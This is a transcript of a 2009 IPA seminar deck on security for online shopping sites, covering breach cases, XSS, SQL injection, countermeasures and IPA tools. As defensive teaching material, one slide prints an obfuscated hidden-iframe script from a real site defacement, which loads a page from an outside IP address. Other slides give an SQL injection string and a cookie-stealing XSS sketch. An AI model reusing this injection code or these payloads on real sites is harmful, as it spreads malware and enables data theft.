ネット通販セキュリティ対策セミナー - IPA板、ブログ、Wiki 等のウェブ...

Copyright © 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー

ネット通販セキュリティ対策セミナー

ネット通販サイトにおける脅威と対策方針～近年の脅威やその対策方針、セキュリティ対策ツールの紹介など～

独立行政法人情報処理推進機構セキュリティセンター


１．今、何が起こっているのか？1.1 インターネットを取り巻く状況は？

1.2 ウェブアプリケーションの脆弱性

1.3 ウェブサイト形態と対応責任

2

２．脆弱性の解説３．ウェブサイトのセキュリティ対策方針４．セキュリティ対策ツールの紹介


1.1 インターネットを取り巻く状況は？

3

恐ろしい状況の前に、まずはネット通販の特色から。

本日お越しの皆様は、今インターネット上でどのような状況となっているかわかりますか？


ネット通販の利便性

インターネットを利用した通信販売は、新鮮な情報をいち早く掲載でき、柔軟な価格設定やキャンペーン等の販促も手軽に実施可能で、また利用者登録により利用者への利便性も上げられ、従来の通信販売と比べ飛躍的に営業効率を上げられる。

このようなメリットから、どれだけ売上げを上げられるか「成功の秘訣」「効果的な広告掲載」「購買分析」などデザインや表現を重視したウェブサイトを開発する事になる。

4


ネット通販における考慮など

これらの考えは事業発展における重要なファクターである。

もちろん「ネット通販における規制」や「広告メールに関する規制」など各種規制関連は対策され守られるものである。

またクレーム対策などのノウハウは蓄積されている。

しかし、次の問題は解決されているか？

5


インターネット上の被害例（その１）

6

価格情報提供サイト

2005年5月、ウェブサイトに不正なプログラムが

仕掛けられ、閲覧したユーザがウイルスに感染したという事を発表。

ウェブサイトのプログラムを直すそばから何者かにより改ざんされていった。その後攻撃の頻度が急増しサイトを閉鎖。（10日間の閉鎖）

登録ユーザのメールアドレス2万2511件漏えい。

5月の月間PVは、前月比で約4割減。

取引業者への影響大。


インターネット上の被害例（その２）

7

音響機器・楽器通販サイト

2008年4月、サイバー攻撃により顧客情報が10 万件弱流出した可能性がある事を発表。

クレジットカード情報が不正利用され、2008年3月にカード会社が検知し判明。

セキュリティ会社の調査により、2006年6月頃に最初の不正侵入があった事が判明。

会員12万2884人に1000円を次回購入時割引。

セキュリティ会社への作業依頼とサーバ交換等で6,000万円強の費用をかけた対策を行った。


インターネット上の被害例

他にもインターネット通販サイト等に、多くの被害が取り沙汰されている。

8

• クレジットカード番号や個人情報の漏えい– 健康食品や医薬品販売サイト

– 化粧品販売サイト

– 雑貨販売サイト

– 釣具・アウトドア用品販売サイト

• ウイルス感染などを引き起こすウェブサイトの改ざん– ウイルス対策ソフト開発会社

– 自動車情報サイト

– 政府関連のウェブサイト

– 家庭用ゲーム会社のウェブサイト（米国）

など

これは代表的な内容であり、毎日のようにホームページが攻撃され被害が出ている。


ネット通販をとりまく脅威(*1)

フィッシングサイト（別ドメイン利用、脆弱性利用）

偽情報の表示

カード番号やパスワード等の情報漏えい

他人へ「なりすまし」

商品の購入

DB(*2)に蓄積された非公開情報の閲覧

重要（個人）情報漏えい

DB に蓄積された情報の改ざん、消去

偽情報の表示、パスワード変更、システム停止

ウイルス感染サイト化(*1) 脅威とは、被害に繋がるような状態。(*2) DB（データベース）：関連し合うデータを収集・整理して、検索や更新を効率化したファイル。

9


脆弱性による脅威

10

これらの脅威は、ウェブアプリケーションに脆弱性が存在する事が原因で、その脆弱性を悪者が利用し攻撃した事によるものです。

フィッシングサイト（脆弱性利用）なりすまし

クロスサイト・スクリプティングの脆弱性

DB に蓄積された・非公開情報の閲覧・情報の改ざん、消去

SQLインジェクションの脆弱性


1.2 ウェブアプリケーションの脆弱性

11

本日のセミナーでは、最近大きな被害に繋がっている

ウェブアプリケーションの脆弱性

に関するセキュリティ対策を取り上げる。


そもそも脆弱性ってなに？

脆弱性（ぜいじゃくせい）とはコンピュータ不正アクセスやコンピュータウイルスなどの攻撃により、その機能や性能を損なう原因となり得るセキュリティ上の問題箇所のこと（出典：情報セキュリティ早期警戒パートナーシップガイドライン）

脆弱性を利用すると問題点箇所を巧みに悪用し、コンピュータの内部データ（情報）を盗んだり、書き換えたり、削除したり、また他のコンピュータへの

同様の悪事を働くことが可能となる（これが不正アクセスであり、プログラム化して自動的に動作するのがウイルスやボットである）

脆弱性対策は根本的なセキュリティ対策セキュリティ対策としてウイルスなどの対策も十分必要だが、脆弱性を無くすことが最も重要！！

12

要は、第三者からの攻撃


ウェブページは2つのタイプに分けられる。

静的ページ

• いつ見ても変わらぬ内容を表示（画像やテキスト文字等）

• 静的なコンテンツをウェブサーバが表示する

動的ページ

• 入力された内容を元に DB へ問合せ、必要な情報を取得し、それを元にウェブページを生成し表示する

• 利用者が入力した内容を確認するページなどが該当

• SNS、ブログ、電子掲示板、ショッピングカートなど

13

ウェブアプリケーションとは？

動的ページを作りだすプログラムがウェブアプリケーション。


1.3 ウェブサイト形態と対応責任

代表的な通販サイトの形態と脆弱性対応責任

14

No

サイト形態形態概要脆弱性の可能性脆弱性対応責任

１オーサリングツール利用

ウェブページ作成ソフトウェア製品を使い、自分でホームページを作成する方法。

ウェブページ作成用サンプルプログラムや、機能モジュールに脆弱性。

製品の脆弱性は製品開発者に対応責任があるが、サイト運営者として最新版製品を入手し、サイトに反映させる責任がある。

２ポータルサイト構築ソフトウェア製品利用

ショッピングカート、電子掲示板、ブログ、Wiki 等のウェブ

アプリケーションソフトウェア製品（CMS等）を使う方法。

•製品そのものが抱える脆弱性。

•独自でカスタマイズし利用する事もあり、カスタマイズ部分に脆弱性が発生する可能性あり。

•製品の脆弱性の場合は No1 の対応責任と同様

•独自の場合はサイト運営者の責任で対処する。

３独自開発のうえ利用

機能やデザインを独自なものとする為、自社や委託先でウェブアプリケーションを開発し、それを使う方法。

脆弱性が発生する可能性あり。

セキュリティを十分考慮した設計・開発がなされていないと、その可能性が高い。

自社開発であれ委託開発であれ、サイト運営者に対応責任がある。

４ ISP 提供サービス利用

ISP が CMS や DB 等を活

用し、「簡単ホームページ作成」と言うようなサービスを提供。それを使う方法。

ISP はウェブアプリケーションソフト

ウェア製品を利用しており、製品に脆弱性が発見される可能性あり。

•ISP が製品の管理まで行う場合は ISPが対応。•ISP は製品のインストールまでで、後の対応はサイト運営者責任のケースもある。

５ショッピングモール等のサービスを利用

ショッピングモールで提供している、支払決済や配送なども含めたショッピング機能を使う方法。

ショッピングモールで利用しているウェブアプリケーションソフトウェア（独自開発やソフトウェア製品）に脆弱性が発見される可能性あり。

•ショッピングモールが対応。


対応責任を踏まえたサイト運営者の役割

自社（委託を含む）責任の場合脆弱性の原理や対策方法の理解、および対策。

委託発注時にセキュリティ要件を盛込む。

委託契約内容の確認（脆弱性発生時の保守など）

製品開発者責任の場合製品仕様の確認（脆弱性なのか機能が不十分なのか）

製品開発者への脆弱性報告（後述のパートナーシップを利用）

製品が対策された時点で、サイト運営者がサイトに反映させる。

サービス提供者責任の場合（ISPやモールなど）サービス規定の確認（脆弱性等不具合への対応責任）

サービス提供者への連絡

15


１．今、何が起こっているのか？２．脆弱性の解説

2.1 情報セキュリティ早期警戒パートナーシップ

2.2 脆弱性関連情報の届出状況

2.3 クロスサイト･スクリプティング

2.4 SQLインジェクション

16

３．ウェブサイトのセキュリティ対策方針４．セキュリティ対策ツールの紹介


脆弱性情報を適切に流通させるために不適切な脆弱性の公開による問題は実際に発生しており、それを解決させるために2004年7月経済産業省告示「ソフトウエア等脆弱性関連情報取扱基準」が制定された。これを踏まえ、IPA・JPCERT/CCなど6団体から、脆弱性関連

情報の適切な流通により、コンピュータ不正アクセス、コンピュータウイルスなどによる被害発生を抑制するために、関係者に推奨する行為をとりまとめた「情報セキュリティ早期警戒パートナーシップガイドライン」が公表された。

2.1 情報セキュリティ早期警戒パートナーシップ（脆弱性関連情報の届出制度）

【受付分析機関】

【調整機関】脆弱性関連情報届出

脆弱性関連情報通知

対応状況の集約公表日調整等

17


届出累計が 5,000 件を突破！

脅威的な届出件数届出開始から約 4 年間で 2,045 件、ここ 1 年間で 3,206 件

1日に平均 4.6件の届出（最大142件/日、2008年11月7日）

2.2 脆弱性関連情報の届出状況

18

脆弱性関連情報の届出件数の四半期別推移


ウェブサイト脆弱性届出の種類別内訳

ウェブサイト脆弱性の種類は「クロスサイト・スクリプティング」と「SQLインジェクション」が約6割を占める

19

ウェブサイトの脆弱性として IPA に届けられ受理した 4,235 件の内訳～届出開始から2009年第１四半期（2009年3月末）まで～


2.3 クロスサイト･スクリプティング

20

能動的攻撃攻撃者は、直接サーバなどを攻撃する。イントラネット内への攻撃は難しい。攻撃される側の行動は不要で、いつでも攻撃可能。

受動的（誘導型）攻撃攻撃者は、利用者が特定の行動をとるよう誘導する。FW で通信を許可している、ウェブやメール等を利用した攻撃。イントラネット内のシステムの攻撃に、よく用いられる。

○○○○○○○○

■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

誘導型攻撃のイメージ


近年のネットワーク環境の変化により、多くのネットワークにファイアウォールの導入が進んだ

個人のような小規模なネットワークであっても、「Windows ファイアウォール」のように、OS に標準搭載されたファイアウォールが機能するようになった

利用者が罠のウェブページやメールを閲覧することで、成立する攻撃に移行

「誘導型」攻撃が増えた背景

21


迷惑メール経由の攻撃例

「誘導型」攻撃のイメージ

ａ）書かれているリンク先は、人気動画サイトのURLに見せかけているが、実際のリンク先はウイルスが埋め込まれているウェブサイト

ｂ）ここをクリックすると、ウイルスがダウンロードされる！

22


利用者

ウェブサーバ

検索キーワード IPA

利用者

検索キーワード<s>IPA</s>

ウェブサーバ

<s>は、取り消し線を引くHTMLタグ

<html>【IPA 】を含む検索結果…</html>

IPA

<html>【<s>IPA</s> 】を含む検索結果…</html>

<s>IPA</s>

"<" および ">" が出力され、HTMLタグとして認識されてしまう（表示が崩れる）

【IPA】を含む検索結果

【IPA】を含む検索結果

①

②③

①’

②’③’

23

クロスサイト・スクリプティングの動作（その１）


一般利用者

【<script>…document.cookie…</script>】を含む検索結果

脆弱なウェブサーバへのリンク（悪意のスクリプトを含む）

悪意のあるウェブサーバ

ウェブサーバ

・ウェブページに好きな文章等を表示させる（ページ改ざん）・ブラウザ上からは見えない命令を書き込み、情報を盗む

悪意のあるウェブサーバにセッションCookie をこっそり送信するようなスクリプト

スクリプトがページ内に書き込まれる

<script>…document.cookie…</script>

スクリプト実行

【】を含む検索結果

①

②

③④

⑤

⑥

24

検索キーワードセッションIDやCookie

クロスサイト・スクリプティングの動作（その２）


2.4 SQLインジェクション

25

○○○○

○○○○○○○○

■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

○○○○○○○○

■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

○○○○

○○○○○○○○

■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

http://△△△.or.jp/

http://▼▼▼.ne.jp/

http://○○○.co.jp/

SQL インジェクション攻撃による、ウイルス感染イメージ


ウェブサイトへの攻撃が増えた背景

26

2006 年に出現したMPackやIcePackなどのウェブサイト攻撃ツールによって攻略される

ウェブサーバやウェブアプリケーションの複数の

脆弱性を自動的に攻撃する機能や管理機能を備え、販売されている。

●攻撃対象のサイトへ

罠サイトへ誘導する

仕組みを埋め込む。

●サポートが充実。

頻繁にアップデートも。

●各種ウイルス対策ソフトに

検出されない旨をアピール

●価格（元を日本円換算）

1ヶ月： 6,000円

2ヶ月：15,000円

4ヶ月：30,000円

6ヶ月：45,000円

中国では決して安くない。

●しかしこのソフトにも

脆弱性が存在。(^_^;)認証が回避可能な

裏ツールも出回る。

ファイル形式攻撃対象の脆弱性

攻撃先 URL

オプション会員認証サポート先2006 年に出現したMPackやIcePackなどのウェブサイト攻撃ツールによって攻略される

ウェブサーバやウェブアプリケーションの複数の

脆弱性を自動的に攻撃する機能や管理機能を備え、販売されている。

ウェブサイトの改ざんは、他の攻撃と同様、目に見えない形で行われる傾向がある

インラインフレームやスクリプトなどといった、不可視の状態でウェブサイトに挿入できるものが混入されるため、利用者がウェブブラウザから閲覧しただけでは違いが全く判らない。


ウェブサイトの改ざん例

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4760be4c05e00(v4760be4c065f7){ function v4760be4c06def () {return 16;} return(parseInt(v4760be4c065f7,v4760be4c06def()));}function v4760be4c07de0(v4760be4c081dc){ var v4760be4c085d9='';for(v4760be4c089d5=0; v4760be4c089d5<v4760be4c081dc.length; v4760be4c089d5+=2){ v4760be4c085d9+=(String.fromCharCode(v4760be4c05e00(v4760be4c081dc.substr(v4760be4c089d5, 2))));}return v4760be4c085d9;} document.write(v4760be4c07de0('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3735393830313431207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313632353235292B27663865656666625C272077696474683D353931206865696768743D323735207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

27

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function ..


SQLインジェクションの動作

ウェブサーバ＋

ウェブアプリ

データベース

ID john

userjohnの情報

SELECT * FROM user WHERE id=‘$ID’ SQL文例

SELECT * FROM user WHERE id= ‘ john 'john

一般利用者

悪意を持つ人

ID john ’ or ‘A’=‘A

全てのユーザの情報

SELECT * FROM user WHERE id= ‘ john’ or ‘A’=‘A 'john’ or ‘A’=‘A

「全て」を意味する

・データベースから重要な情報が盗まれてしまう

①

②

③

④

①’

②’

③’

④’

28


SQLインジェクションの攻撃傾向

29

出典：株式会社ラック「SQLインジェクション攻撃検知（2009年2月まで）」よりhttp://www.lac.co.jp/info/alert/alert20090303.html


１．今、何が起こっているのか？２．脆弱性の解説３．ウェブサイトのセキュリティ対策方針

3.1 ネット通販における他の脅威と対策

3.2 セキュリティ確保のための基本対策

30

４．セキュリティ対策ツールの紹介


3.1 ネット通販における他の脅威と対策

31

ウェブアプリケーションの脆弱性以外にも脅威は存在する。

紙媒体・記録媒体（USB，CD‥）等の紛失・盗難

メール等の誤送信マネジメント的対策（ポリシー・ルールの策定と運用）

技術的対策（接続装置の制御、記憶媒体の暗号化）

ウイルス・ワーム感染ウイルス対策ソフトの利用

ウェブサーバの設定ミスなど不適切な運用サーバの要塞化

通信の盗聴SSLなどの暗号化通信


3.2 セキュリティ確保のための基本対策

セキュアなウェブサイトを構築・維持するためには、全体を見通し

た出来るだけ漏れがない対策を、組織的に実施することが重要。

セキュリティ予算確保

開発の委託

セキュアな開発

適切なサーバ構築

ID・パスワードの強化

設定情報のバックアップ・ログ収集

セキュリティ対策機器の導入・監視

セキュリティ監査

セキュリティ事故発生を想定した体制作りと運用

セキュリティメンテナンス

製サ

製サ

製サ

製サ

この基本対策は、自社でウェブサイトを構築管理している事を対象としている。

ソフトウェア製品利用時には ⇒サービス利用時には ⇒

製

サ

32


セキュリティ予算確保

セキュリティ確保のために予算化ウェブサイト運営にはセキュリティ対策の責任がある。

セキュリティ対策や維持には相応の費用が必要。• 脆弱性を作り込まぬために必要な費用

• セキュリティは時間と共に強度が低下するため維持する費用

ウェブサイト運営の企画段階から開発や運用に必要なセキュリティ予算を検討し確保する。

上司や予算担当者への説得セキュリティ対策の重要性と必要費用を説明。

セキュリティ対策は費用対効果が計りづらいものだが、安全性を訴えた積極的なサイト運営を特色とするのも手ではないか。

33

製サ


開発の委託

セキュリティ発注要件の必要性従来の開発では、契約上セキュリティに関する要件は十分な内容ではなかった。

その結果、脆弱性のようなセキュリティに関する問題が発覚しても、委託側・受注側ともに不幸な結果を招く事が多い。

特に委託側に新たな費用を必要とする傾向がある。

セキュリティ要件を盛り込む瑕疵担保契約にて責任を明確する。

発注仕様や要求仕様に具体的な要求仕様を盛り込む。

34

http://www.jnsa.org/active/2005/active2005_1_4a.html

参考：JNSAセキュアシステム開発ガイドライン「Webシステムセキュリティ要求仕様（RFP）」編 β版


セキュアな開発

セキュリティを確保したウェブアプリケーションの開発にはセキュリティ（脆弱性）の知識が必須。自社で開発する上では十分理解する必要がある。

脆弱性の理解

脅威の仕組みや問題の原因を正しく理解する。

• 「知っていますか？脆弱性（ぜいじゃくせい）」

安全なプログラミング

安全にプログラムを作成する知識を身に付ける。

• 「安全なウェブサイトの作り方」

• 「セキュア・プログラミング講座」35


セキュリティを考慮したシステム構成

ネットワークセグメントの分離

• 外部セグメント、DMZ（非武装地帯）の設置、内部セグメント

サーバ要塞化

最小構成

• 不要なサービスの停止

• 不要なアプリケーションの削除

最新のソフトウェア構成

アクセスコントロール設定

• 職務に応じた適切なアクセス権

適切なサーバ構築

36

インターネット

ファイアウォール

ウェブサーバ

メールサーバ

DNSサーバ

DBサーバ

DMZ 内部セグメント

外部セグメント


ID・パスワードの強化

パスワード管理を徹底

不要なアカウントの削除

辞書に載っている文字列は使わない

長くて複雑なパスワード設定（英字＋数字＋記号）

SSH 接続を使う場合

公開鍵認証方式を利用

パスワードをどうしても利用する場合は徹底管理

37

製サ


設定情報のバックアップ・ログ収集

正常時の設定情報などを保管各サーバ設定内容、変更記録、作業手順など

とにかく資料を残す。画面キャプチャーでも可。

必要なログ

UNIX系OSログイン・ログアウト、プロセスの起動・終了、コマンド実行など

Windows系OSログオン・ログオフ、アプリケーションの起動と停止、システム設定の変更、各種イベントの発生状況など

Webサーバ各クライアントからのアクセス履歴、エラーログなど

ログ解析の警告メールの自動送信化。NTP時刻同期。38


セキュリティ対策機器の導入・監視

ファイアウォール内部から外部への不要な通信を許可している場合が多い。

IDS（侵入検知システム）／IPS（侵入防止システム）IDSは通信回線を監視しネットワークへの侵入を検知して管理者に通報するシステム。IPSはIDSの機能を拡張し、侵入を検知したら接続の遮断などの防御をリアルタイムに行なう機能を持つ。

WAF（Web Application Firewall）IDS/IPS ではパケットの中身に危険なコードが含まれていても中身までは解析できないことがあるが、WAF ではパケットの中身までを解析し、危険なコードをブロックすることができる。

リアルタイム監視これらのセキュリティ対策機器を利用し、発生した警告をすぐさま察知し、問題の通信を瞬時に防ぐ事が大切である。• 24時間365日対応できるエキスパートを自社雇う若しくは育てる。• 専門のセキュリティベンダーに任せる。（餅は餅屋）

39

IDS/IPSファイアウォール WAFサーバ

FW・IDS/IPS・WAFの設置と防御のイメージ


セキュリティ検査

セキュリティ検査、ウェブアプリケーション検査ウェブサイト公開にあたり十分なセキュリティ対策が行われているか、第三者からの検査にて問題点を確認し、問題があれば対処のうえ公開する。

時間とともに新たな脆弱性が発見されるので、定期的な検査も重要。

情報セキュリティ監査企業台帳情報セキュリティ監査をサービスとして行う主体を登録

情報セキュリティ対策ベンチマーク組織のセキュリティ対策状況を自ら評価するための自己診断ツール

40


【参考】情報セキュリティ監査企業台帳

41

http://www.meti.go.jp/policy/netsecurity/is-kansa/


【参考】

情報セキュリティ対策ベンチマーク

42http://www.ipa.go.jp/security/benchmark/


【参考】PCI DSS（Payment Card Industry Data Security Standard）

43

PCI DSSは、クレジット決済サービスに携わる事業者の間で、クレジットカード情報や

決済情報を保護するための基準を共通化することを目的とした、情報セキュリティ基準である。

PCI DSSは、国際ペイメントブランド5社（Visa, Master, American Express, Diners, JCB）が共同で設立した機関であるPCI SSC（Security Standards Council）が2006年9月から策定・運用しているもので、事実上の世界標準となりつつある。

PCI DSSの規程は、「安全なネットワークの構築と維持」や「脆弱性管理プログラムの整備」などの6分野を対象とし、「ファイアウォールをインストールして構成を維持す

ること」や「アンチウィルスソフトウェアまたはプログラムを使用し、定期的に更新すること」など、合計で12の要件を定めている。要件は具体的に記載されており、解釈の違いが起こりにくくなっている。

クレジット決済事業者はPCI DSSへの準拠が義務化されつつある。義務化される時

期やその内容は、国や事業者の規模等によって異なる。日本の大規模店舗の場合、あるペイメントブランドにおいて2010年9月30日に義務化される見込みであり、他のネットショップ事業者、決済代行事業者などにおいても対応が必要と見込まれる。


セキュリティ事故発生を想定した体制作りと運用

セキュリティ事故が起こると、被害はその会社だけに留まらず、取引先や関係者にも大きな影響を与える。

事故が起きる前に、事故対応の準備が必要。

社内体制の確立

役割分担の決定（特に責任者）

連絡経路の整備

運用手順書などの作成

模擬訓練

44

製サ


セキュリティメンテナンス

情報収集と対策の実施脆弱性は日々発見されるので、OSやソフトウェアの開発者

から提供される脆弱性情報を継続的に入手し、ソフトウェアの更新や問題の回避が必要。

日頃の情報収集JVN 、 JVN iPedia 、 MyJVN 、 IPA利用製品ベンダーのHP各種MLニュースサイト

セキュリティパッチの検証環境テスト系サーバの確保

45

製サ


【参考】脆弱性対策情報ポータルサイト＆データベース

JVN（Japan Vulnerability Notes）＆ JVN iPedia

46

JVN JVNhttp://jvn.jp/製品開発者と調整した脆弱性対策情報をタイムリーに公開

JVN iPediahttp://jvndb.jvn.jp/国内で利用されている製品を対象にした脆弱性対策情報を網羅し蓄積

JVN iPedia


１．今、何が起こっているのか？２．脆弱性の解説３．ウェブサイトのセキュリティ対策方針４．セキュリティ対策ツールの紹介

4.1 情報セキュリティ対策ツール情報

4.2 iLogScanner4.3 ウェブサイト運営者のための脆弱性対応ガイド

4.4 安全なウェブサイト運営入門

47


4.1 情報セキュリティ対策ツール情報その１

http://www.ipa.go.jp/security/vuln/vuln_contents/

「知っていますか？脆弱性（ぜいじゃくせい）」 - アニメで見るウェブサイトの脅威と仕組み -

http://www.ipa.go.jp/security/awareness/vendor/programmingv2/

新版「セキュア・プログラミング講座」

脆弱性の理解

脆弱性を作らないために

http://www.ipa.go.jp/security/vuln/documents/website_security.pdf

「安全なウェブサイトの作り方改訂第3版」

48

ウェブサイトの脆弱性検出ツール iLogScanner

ウェブサイト運営者のための脆弱性対応ガイド

脆弱性攻撃の状況把握

脆弱性が発見されたら

「安全なウェブサイト運営入門」－７つの事件を体験し、ウェブサイトを守り抜け！－

ウェブサイトの事件を体験


リモートアクセス環境におけるセキュリティ

不正アクセスに関する届出

4.1 情報セキュリティ対策ツール情報その２

電子メールの安全性を高める技術の利用法

大企業・中堅企業情報システムのセキュリティ対策～脅威と対策～

電子メールのセキュリティ

企業向けセキュリティ対策

小規模企業のための情報セキュリティ対策

http://www.ipa.go.jp/security/fy18/reports/contents/

リモートアクセス

49

不正アクセスの被害を受けたら

http://www.ipa.go.jp/security/ciadr/


4.2 iLogScanner（ウェブサイトの脆弱性検出ツール）

自前でウェブサイトを構築している運営者

どれほどの攻撃を受けているか、攻撃による被害が発生していないか、常に状況を把握し対策を検討する必要がある。

攻撃の状況を確認するためには、特別なスキルが必要

自前でセキュリティ技術者の育成や、有償のセキュリティ監視サービスを受ける必要がある。

一般のサイト運営者が簡単に確認できない。

50

http://www.ipa.go.jp/security/vuln/iLogScanner/



「iLogScanner」がウェブサイトのアクセスログを解析。

ウェブサイトへの攻撃痕跡を確認可能。

一部の痕跡に関しては、攻撃が成功した可能性を確認可能。

ただし iLogScanner は簡易ツール

攻撃と思われる痕跡を全て網羅し、確実に検出するものではない。誤検出もあり得る。

iLogScannerで攻撃が検出された場合、セキュリティベンダーへの相談をお勧め。

51

過信は禁物




(*1) OSコマンド・インジェクションとは、Webサーバ上の任意のOSコマンドが実行されてしまう問題です。これにより、

Webサーバを不正に操作され、重要情報などが盗まれたり、攻撃の踏み台に悪用される場合があります。

(*2) ディレクトリ・トラバーサルとは、相対パス記法を利用して、管理者が意図していないWebサーバ上のファイルや

ディレクトリにアクセスされたり、アプリケーションを実行される問題です。これらにより、本来公開を意図しないファイルが

読み出され、重要情報が盗まれたり、不正にアプリケーションを実行されファイルが破壊されるなどの危険があります。

(*3) その他（IDS回避を目的とした攻撃）とは、１６進コード、親パス等の特殊文字を使用して偽装した攻撃用文字列で

攻撃が行われることによりアプリケーションの妥当性チェック機構を迂回し、SQLインジェクション、クロスサイトスクリプ

ティング等の攻撃を行うことを狙ったものです。また、ワームなどが悪用するWebサーバの脆弱性を突いた攻撃でも、

このような特殊文字が使われます。それぞれの攻撃に応じた対策が必要になります。

52

脆弱性の種類攻撃と思われる

痕跡攻撃が成功し可能性が高いと思われる痕跡

SQLインジェクション ○ ○

クロスサイト・スクリプティング ○ －

OSコマンド・インジェクション(*1) ○ －

ディレクトリ・トラバーサル(*2) ○ －

その他（IDS回避を目的とした攻撃）(*3) ○ －




53

検出環境




54

解析結果ログ表示




55

解析結果サマリー表示



4.3 ウェブサイト運営者のための脆弱性対応ガイド

もしも脆弱性が発見されたらどうします？

対応方法の手引き

ガイドの構成

脆弱性や修正に関する基本的な知識。

脆弱性を放置することの問題。

外部から脆弱性の存在を指摘された場合どうするべきか。

具体的な脆弱性の確認・修正の作業手順、など。

56

http://www.ipa.go.jp/security/ciadr/vuln_website_guide.pdf


4.3 ウェブサイト運営者のための脆弱性対応ガイド

1. ウェブサイトの危険性

1.1. 背景

1.2. ウェブサイトで起こるトラブル

1.3. 運営者に問われる責任

1.4. 本資料の目的

2. ウェブサイトに必要な対策

2.1. トラブルの原因となる脆弱性

2.2. 求められる継続的な対策

2.3. 対策実施にあたり理解すべきこと

3. ウェブサイトに脆弱性が見つかった場合

3.1. 脆弱性をどのように見つけるか

3.2. IPA から脆弱性に関する連絡を受けた場合

3.3. 対応は意思決定から始まる

4. ウェブサイト運営者のための脆弱性対応マニュアル

4.1. 対応の全体に係る留意点

4.2. 脆弱性に関する通知の受領

4.3. セキュリティ上の問題の有無に関する調査

4.4. 影響と対策の方向性の検討

4.5. 対策作業に関する計画

4.6. 対策の実施

4.7. 修正完了の報告

4.8. その他

付録：脆弱性について通知を受けた場合の作業チェックリスト

57

ガイドの内容



58

セキュリティ対策は経営的にコストとしか考えられていない。

積極的な経営戦略と捉えるべき。

しかし現実には、痛い目を見ないと、動こうとしない。お金を使おうとしない。

「攻撃されるしかない」「やられるしかない」と考えがち。

それじゃぁいけないだろう。事故起こしてからでは遅い。

擬似的に事故を体験し脅威を理解させられないか。自分の意志で対応を選択するゲームのような。

面白く、わかりやすい教材はないか。

このようなコンセプトから生まれたのが．．．



60

７つのインシデント1. 電子メールの誤送信2. クロスサイト・スクリプティング3. SSLサーバ証明書の

期限切れ4. ウイルス感染5. サービス運用妨害6. セッション管理の不備7. SQLインジェクション

・非技術者でも分かり易いよう心掛けた内容や言葉遣い。難しい専門用語にはルビで説明。

・各章の終わりで、寄り道として補足コンテンツが有り。話を振り返り正しい対策論、その脅威の数字的なダメージなどを学ぶ事も可能。

結果でシナリオが変化、会社の経営に影響も！結果の積重ねでサイトの評判に影響し売上にも影響。引いては会社の経営にも影響。最悪会社が危機的状況に！上手く行けば事業拡大、分社化しプレイヤーが本部長に。

問題の対策をプレイヤーが選択

お客様からの問合せ殺到・・・インシデント発生！

ショッピングサイト運営中の主人公に…

主人公がｲﾝﾀｰﾈｯﾄショッピングサイト責任者に！

プレイヤーが主人公として７つのセキュリティ事故を体験し対応する



61

ニュースサイト記事やブログで評判メディアや体験者からの評判は良好！

記事： INTERNET Watch、Security NEXT、ZDNet Japan、Itmedia

レビュー：夕刊フジ、@IT、Slashdot、EnterpriseZine、CodeZine、RBB TODAY、マイコミジャーナル

セキュリティやWebサイト運営の基礎的な内容から解説されているそうなので、入門用教材として良いかと思われます。（出典：Slashdot ）選択肢についてはさほど難しく感じることは少なかった。しかし、実際に、自らの運営するWebサイトにセキュリティ事件が発生した場合、このような冷静な判断ができるであろうか? (中略)本ソフトでは、あえて「正しくない」選択をした場合にどのような結末を迎えるのか、それを読むのも有意義である

と思う。 (中略)本ソフトの最後に「商品と同様に安全を売るショップということでも注目を集めた」という台詞がある。これこそが

ネットショップに、今、求められるものではないだろうか。（出典：マイコミジャーナル）

ブログ：30 以上ものブログで評価

「このようなゲーム感覚でセキュリティについて学ぶというのは、より実践的な経験を積むことができるので、セキュリティ教育にはとてもよい教材だと思いますグッド！」できれば、小学校、中学校、そして高校の授業でこのソフトを用いたセキュリティ教育をしていただきたいものです。（出典：情報セキュリティ学院）



62

社内教育や大学授業、イベントでの利用も社内教育：コンサルティング会社、他

大学授業： A大学

イベントでのセキュリティ啓蒙：地域ict未来フェスタ2008inとくしま

メーリングリスト： N地域地場産業振興センター



63

ダウンロード

アンケート協力のお願い

本日配布したＣＤ－ＲＯＭ内に、「安全なウェブサイト運営入門」が入っておりますので、是非、ご利用頂きたく思います。

今後の普及啓発ツール・資料等の作成に活用させていただくため、同封のアンケートにご協力頂き、記載の電話番号にＦＡＸをお願い致します。

「安全なウェブサイト運営入門」－７つの事件を体験し、ウェブサイトを守り抜け！－

http://www.ipa.go.jp/security/vuln/7incidents/index.html


セキュリティセンター（IPA/ISEC）http://www.ipa.go.jp/security/★情報セキュリティ関連相談窓口：

ＴＥＬ０３（５９７８）７５０９ (平日10:00-12:00、13:30-17:00)

ＦＡＸ０３（５９７８）７５１８E-mail： [email protected] (ウイルス関連)

[email protected] (不正アクセス関連)[email protected] (Winny関連)[email protected] (その他セキュリティ全般)

64

ネット通販セキュリティ対策セミナー - IPA板、ブログ、Wiki 等のウェブ...

Documents

Transcript of ネット通販セキュリティ対策セミナー - IPA板、ブログ、Wiki 等のウェブ...